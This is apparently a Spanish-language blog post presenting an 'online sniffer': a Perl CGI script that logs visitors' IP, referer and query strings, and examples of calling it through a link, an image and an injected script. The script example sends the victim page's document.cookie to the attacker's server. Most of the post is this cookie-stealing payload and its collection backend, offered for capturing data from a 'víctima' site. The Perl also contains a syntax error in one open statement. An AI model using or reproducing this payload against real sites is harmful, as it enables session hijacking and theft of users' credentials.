Online Sniffer
Online sniffer permite detectar tales datos como IP dirección, URL dirección completa de la web víctima desde donde fue capturado la data necesaria.
Sniffer devuelve al browser GIF file transparente del tamaño 1x1
px.
En este ejemplo al sniffer se le está enviando datos mediante CGI llamada . Por ejemplo
http://tu_web.com/cgi-bin/s.jpg?AQUI_TUS_DATOS
Ejemplo de uso de sniffer:
Una simple llamada por vínculo
<a href="http://tu_web.com/cgi-bin/s.jpg?it is test">click me</a>
Por imagen
<img src="http://tu_web.com/cgi-bin/s.jpg" />
Por script
<script>img = new Image(); img.src = "http://tu_web.com/cgi-bin/s.jpg?"+document.cookie;</script>
Codigo fuente de Online Sniffer basado en Perl
#!/usr/bin/perl
#ruta a log file
$LogFile="log.txt";
#cantidad maxima de logs
$mlength=50;
#hacer redirect a imagen
print "Location: image.gif\n\n";
#lectura de CGI llamada
read(STDIN, $input, $ENV{'CONTENT_LENGTH'});
$input = $ENV{'QUERY_STRING'} if $ENV{'QUERY_STRING'};
$input =~
s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
#obtener hora de llamada y HTTP_REFERER
$now_string = localtime;
$ref = $ENV{'HTTP_REFERER'};
#lectura de logs en masivo
open (LOG,"$LogFile") die "Can't
Open $LogFile: $!\n";
@LOGtext=<LOG>;
close (LOG);
#abrir log
open (LOG, ">$LogFile");
#guardar datos de log
print LOG "[$now_string] IP=$ENV{'REMOTE_ADDR'}
REFERER=$ref QUERY=$input\n";
#guardar logs de tal forma que no supere mlenght
$counter=1;
foreach $LOGitem (@LOGtext)
{
if ($counter<$mlength){
print LOG "$LOGitem"; };
$counter++;
};
#cerrar log
close (LOG);
exit;
Post a Comment